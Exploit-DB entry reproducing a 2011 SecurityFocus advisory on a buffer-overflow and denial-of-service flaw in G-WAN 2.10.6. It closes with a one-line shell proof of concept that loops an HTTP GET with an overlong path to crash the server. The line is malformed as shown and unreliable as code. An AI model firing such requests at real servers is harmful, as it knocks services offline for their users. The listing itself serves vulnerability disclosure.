G-WAN 2.10.6 Buffer Overflow Vulnerability and Denial of Service Vulnerability

2011-10-13T00:00:00
ID EDB-ID:36234
Type exploitdb
Reporter Fredrik Widlund
Modified 2011-10-13T00:00:00

Description

G-WAN 2.10.6 Buffer Overflow Vulnerability and Denial of Service Vulnerability. Dos exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/50108/info

G-WAN is prone to a buffer-overflow vulnerability and a denial-of-service vulnerability.

Remote attackers can exploit these issues to execute arbitrary code in the context of the application or crash the affected application.

G-WAN 2.10.6 is vulnerable; other versions may also be affected. 

while: do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n'